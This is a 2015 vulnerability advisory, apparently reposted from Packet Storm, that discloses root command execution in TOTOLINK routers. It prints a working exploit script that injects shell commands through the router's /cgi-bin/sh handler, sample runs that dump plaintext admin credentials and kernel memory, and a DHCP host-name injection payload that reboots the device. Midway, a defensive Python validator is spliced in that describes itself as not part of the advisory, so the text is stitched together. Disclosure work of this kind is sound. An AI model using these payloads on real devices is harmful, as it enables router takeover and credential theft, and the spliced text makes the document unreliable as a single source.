15 TOTOLINK Routers Remote Command Execution

Pierre Kim, packetstormsecurity.com (PACKETSTORM:132709), published Jul 16, 2015

## Advisory Information  
  
Title: 15 TOTOLINK router models vulnerable to multiple RCEs  
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt  
Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html  
Date published: 2015-07-16  
Vendors contacted: None  
Release mode: 0days, Released  
CVE: no current CVE  
  
  
  
## Product Description  
  
TOTOLINK is a sister brand of ipTIME, which holds over 80% of the SOHO
market in South Korea.
TOTOLINK produces routers, Wi-Fi access points and other network
devices. Their products are sold worldwide.
  
  
  
## Vulnerabilities Summary  
  
The first vulnerability allows an attacker to bypass the admin authentication and
to obtain a direct RCE from the LAN side with a single HTTP request.

The second vulnerability allows an attacker to bypass the admin authentication and
to obtain a direct RCE from the LAN side with a single DHCP request.

Both are direct RCEs against the routers which give complete root
access to the embedded Linux system from the LAN side.

The two RCEs affect 13 TOTOLINK products, from 2009-era firmwares up to
the latest firmwares, in the default configuration:
  
- TOTOLINK A1004 : up to the latest firmware (9.34 - za1004_en_9_34.bin)
- TOTOLINK A5004NS : up to the latest firmware (9.38 - za5004s_en_9_38.bin)
- TOTOLINK EX300 : up to the latest firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net)
- TOTOLINK EX300 : up to the latest firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn)
- TOTOLINK N150RB : up to the latest firmware (9.08 - zn150rb_en_9_08.bin.5357c0)
- TOTOLINK N300RB : up to the latest firmware (9.26 - zn300rb_en_9_26.bin)
- TOTOLINK N300RG : up to the latest firmware (8.70 - TOTOLINK N300RG_8_70.bin)
- TOTOLINK N500RDG : up to the latest firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)
- TOTOLINK N600RD : up to the latest firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)
- TOTOLINK N302R Plus V1 : up to the latest firmware 8.82 (TOTOLINK N302R Plus V1_en_8_82.bin)
- TOTOLINK N302R Plus V2 : up to the latest firmware 9.08 (TOTOLINK N302R Plus V2_en_9_08.bin)
- TOTOLINK A3004NS (no firmware available on totolinkusa.com, but ipTIME's A3004NS model was vulnerable to the 2 RCEs)
- TOTOLINK EX150 : up to the latest firmware (8.82 - ex150_ch_8_82.bin.5357c0)
  
  
The DHCP RCE also affects 2 TOTOLINK products, from 2009-era firmwares
up to the latest firmwares, in the default configuration:

- TOTOLINK A2004NS : up to the latest firmware (9.60 - za2004s_en_9_60.bin)
- TOTOLINK EX750 : up to the latest firmware (9.60 - ex750_en_9_60.bin)
  
  
Firmwares come from totolink.net and from totolink.cn.

- From my tests, it is possible to use these vulnerabilities to
overwrite the firmware with a custom (backdoored) firmware.

Given the high CVSS score (10/10) of the vulnerabilities and their
longevity (6+ years old),
TOTOLINK users are urged to contact TOTOLINK.
  
  
  
## Details - RCE with a single HTTP request  
  
The HTTP server allows the attacker to execute some CGI files.

Many of them are vulnerable to command injection, which allows an attacker to
execute commands with the rights of the HTTP daemon user (root).


Exploit code:

$ cat totolink.carnage
#!/bin/sh
# Usage: totolink.carnage <router ip> <command> [args...]
if [ -z "$1" ]; then
  echo "Usage:"
  echo "$0 ip command"
  exit 1
fi
# POST a shell snippet to the /cgi-bin/sh handler; the output of the
# command is printed after a fabricated Content-type header.
wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" "http://$1/cgi-bin/sh"
  
  
The exploits have also been written in HTML/JavaScript, in the form of CSRF
attacks, allowing people to test their own systems live from their
browsers:
http://pierrekim.github.io/advisories/
  
  
o Listing of the filesystem  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html  
  
Using CLI:  
  
root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head  
ash  
auth  
busybox  
cat  
chmod  
cp  
d.cgi  
date  
echo  
false  
root@kali:~/totolink#  
  
  
o How to retrieve the credentials? (see the login and password at the end
of the dumped configuration file)
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html  
  
Using CLI:  
  
kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg  
wantype.wan1=dynamic  
dhblock.eth1=0  
ppp_mtu=1454  
fakedns=0  
upnp=1  
ppp_mtu=1454  
timeserver=time.windows.com,gmt22,1,480,0  
wan_ifname=eth1  
auto_dns=1  
dhcp_auto_detect=0  
wireless_ifmode+wlan0=wlan0,0  
dhcpd=0  
lan_ip=192.168.1.1  
lan_netmask=255.255.255.0  
dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0  
dhcpd_dns=164.124.101.2,168.126.63.2  
dhcpd_opt=7200,30,200,  
dhcpd_configfile=/etc/udhcpd.conf  
dhcpd_lease_file=/etc/udhcpd.leases  
dhcpd_static_lease_file=/etc/udhcpd.static  
use_local_gateway=1  
login=admin  
password=admin  
  
Login and password are stored in plaintext, which is a very bad  
security practice.  
  
  
o Currently running processes:
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html  
  
Using CLI:  
  
kali# ./totolink.carnage 192.168.1.1 ps -auxww  
  
  
o Getting the kernel memory:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html  
  
Using CLI:  
  
kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore  
  
  
o Default firewall rules:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html  
  
Using CLI:  
  
kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL  
  
  
o Opening the management interface on the WAN:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html  
  
  
o Reboot the device:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html  
  
  
o Brick the device:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html  
  
  
An attacker can use the /usr/bin/wget binary located in the file  
system of the remote device to plant a backdoor and then execute it as  
root.  
  
By the way, d.cgi in /bin/ is an intentional backdoor.  
  
  
  
## Details - RCE with a single DHCP request  
  
This vulnerability is the exact inverse of CVE-2011-0997 (which affected
the DHCP client, dhclient, through a server-supplied host name). The DHCP
server in TOTOLINK devices allows remote attackers to execute arbitrary
commands via shell metacharacters in the host-name field of a client's
DHCP request.

Sending a DHCP request with the following host-name option (configured
in dhclient.conf) will reboot the device:

cat /etc/dhcp/dhclient.conf

send host-name ";/sbin/reboot";

When connected to the UART port (`screen /dev/ttyUSB0 38400`), we can
see the stdout of the /dev/console device;
the DHCP request immediately forces a reboot of the remote device:
  
  
Booting...  
  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
@  
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize  
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h  
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName  
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16  
@  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
  
[...]  
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).  
  
Launch iwcontrol: wlan0  
Reaped 317  
iwcontrol RUN OK  
SIGNAL -> Config Update signal progress  
killall: pppoe-relay: no process killed  
SIGNAL -> WAN ip changed  
WAN0 IP: 192.168.2.1  
signalling START  
Invalid upnpd exit  
killall: upnpd: no process killed  
upnpd Restart 1  
iptables: Bad rule (does a matching rule exist in that chain?)  
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )  
Update Session timestamp and try it after 5 seconds again.  
ez_ipupdate callback --> time_elapsed: 0  
Run DDNS by IP change: / 192.168.2.1  
Reaped 352  
iptables: Bad rule (does a matching rule exist in that chain?)  
Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file  
Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist  
Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048  
Reaped 363  
Led Silent Callback  
Turn ON All LED  
Dynamic Channel Search for wlan0 is OFF  
start_signal => plantynet_sync  
Do start_signal => plantynet_sync  
SIGNAL -> Config Update signal progress  
killall: pppoe-relay: no process killed  
SIGNAL -> WAN ip changed  
Reaped 354  
iptables: Bad rule (does a matching rule exist in that chain?)  
ez_ipupdate callback --> time_elapsed: 1  
Run DDNS by IP change: / 192.168.2.1  
Burst DDNS Registration is denied: iptime -> now:26  
Led Silent Callback  
Turn ON All LED  
/proc/sys/net/ipv4/tcp_syn_retries: cannot create  
- - - ---> Plantynet Event : 00000003  
- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE  
  
  
[sending the DHCP request]  
  
  
[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1  
00:01:03 miniupnpd[370]: received signal 15, good-bye  
Reaped 392  
Reaped 318  
Reaped 314  
Reaped 290  
Reaped 288  
Reaped 268  
Reaped 370  
Reaped 367  
- - - ---> PLANTYNET_SYNC_FREE_DEVICE  
Restarting system.  
  
Booting...  
  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
@  
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize  
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h  
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName  
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16  
@  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
Reboot Result from Watchdog Timeout!  
  
- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)  
Delay 1 second till reset button  
Magic Number: raw_nv 00000000  
Check Firmware(05020000) : size: 0x001ddfc8 ---->  
  
  
[...]  
  
  
An attacker can use the /usr/bin/wget binary located in the file  
system of the remote device to plant a backdoor and then execute it as  
root.  
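Since the DHCP RCE comes from the server handing a client-supplied host name to a shell, the defensive fix is to validate option 12 before it can reach any command line. The following Python, added here as an example and not code from the advisory, parses the options of a DHCP message and accepts only RFC 1123 host names (so the ";/sbin/reboot" value above is rejected); the packet builder constructs a sample DHCPDISCOVER and is not a real capture.

```python
import re

DHCP_MAGIC_COOKIE = b"\x63\x82\x53\x63"  # precedes the options field
OPT_PAD, OPT_HOST_NAME, OPT_MSG_TYPE, OPT_END = 0, 12, 53, 255
# RFC 1123 host name: dot-separated labels of letters, digits and hyphens;
# ';', '|', '$', '`', quotes and spaces never match, so ";/sbin/reboot" fails.
HOSTNAME_RE = re.compile(
    r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*")

def parse_dhcp_options(packet: bytes) -> dict:
    """Return {option_code: raw_bytes} from a BOOTP/DHCP message."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(packet) and packet[i] != OPT_END:
        code = packet[i]
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option %d" % code)
        opts[code] = value
        i += 2 + length
    return opts

def host_name_is_safe(raw: bytes) -> bool:
    """True only if the option value is a syntactically valid host name."""
    try:
        return HOSTNAME_RE.fullmatch(raw.decode("ascii")) is not None
    except UnicodeDecodeError:
        return False

def check_host_name(packet: bytes):
    """Return (host_name or None, safe) for one DHCP message."""
    raw = parse_dhcp_options(packet).get(OPT_HOST_NAME)
    return (None, True) if raw is None else (raw, host_name_is_safe(raw))

def build_discover(host_name: bytes) -> bytes:
    """Constructed sample DHCPDISCOVER carrying option 12 (not a real capture)."""
    header = (bytes([1, 1, 6, 0]) + b"\x12\x34\x56\x78" + b"\x00\x00\x80\x00"
              + b"\x00" * 16 + b"\x00\x11\x22\x33\x44\x55" + b"\x00" * 10
              + b"\x00" * 192)                      # 236-byte fixed header
    options = (bytes([OPT_MSG_TYPE, 1, 1])          # message type: DISCOVER
               + bytes([OPT_HOST_NAME, len(host_name)]) + host_name
               + bytes([OPT_END]))
    return header + DHCP_MAGIC_COOKIE + options
```

A DHCP server applying `host_name_is_safe` (or the same rule before writing a lease file or calling a hook script) cannot be driven into a shell by option 12, regardless of what else the client sends.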
  
  
  
## Vendor Response  
  
Due to "un-ethical code" found in TOTOLINK products (i.e. backdoors found
in new TOTOLINK devices), TOTOLINK was not contacted regarding this
case, but ipTIME was contacted in April 2015 concerning the first RCE.
  
  
  
## Report Timeline  
  
* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in  
ipTIME products.  
* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.  
* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.  
* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and  
EX750 routers.  
* Jul 13, 2015: Updated firmwares confirmed vulnerable.  
* Jul 16, 2015: A public advisory is sent to security mailing lists.  
  
  
  
## Credit  
  
These vulnerabilities were found by Alexandre Torres and Pierre Kim  
(@PierreKimSec).  
  
  
  
## References  
  
https://pierrekim.github.io/advisories/2015-totolink-0x00.txt  
https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html  
  
  
  
## Disclaimer  
  
This advisory is licensed under a Creative Commons Attribution Non-Commercial  
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/  
  
  
  
--   
Pierre Kim  
[email protected]  
@PierreKimSec  
https://pierrekim.github.io/  